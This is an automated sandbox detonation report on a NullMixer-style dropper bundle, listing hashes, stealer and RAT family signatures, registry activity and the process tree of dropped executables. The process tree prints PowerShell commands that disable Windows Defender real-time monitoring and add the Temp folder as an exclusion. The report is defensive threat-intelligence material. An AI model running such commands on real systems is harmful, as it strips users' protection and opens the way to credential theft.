| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/1660-52-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC2959AD6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
\Users\Admin\AppData\Local\Temp\7zSC2959AD6\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
Analysis: behavioral20
Detonation Overview
| Submitted | 2024-11-10 17:24 |
| Reported | 2024-11-10 17:27 |
| Platform | win10v2004-20241007-en |
| Max time kernel | 150s |
| Max time network | 150s |
| Command Line | |
Signatures
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-T76J3.tmp\Tue19879c4c0e.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5092 set thread context of 1420 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe |
| PID 2168 set thread context of 4584 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe |
| PID 2336 set thread context of 1232 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1969586bcbf58493.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19150ee2be694c8a4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19411ac950924ec3f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1993b3f72c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-T76J3.tmp\Tue19879c4c0e.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c06f159e0ec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19325eb008c0b950.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757331497987788" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c06f159e0ec.exe
Tue19c06f159e0ec.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3228 -ip 3228
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1993b3f72c.exe
Tue1993b3f72c.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe
Tue193858933525b62.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19150ee2be694c8a4.exe
Tue19150ee2be694c8a4.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe
Tue19879c4c0e.exe
C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19325eb008c0b950.exe
Tue19325eb008c0b950.exe
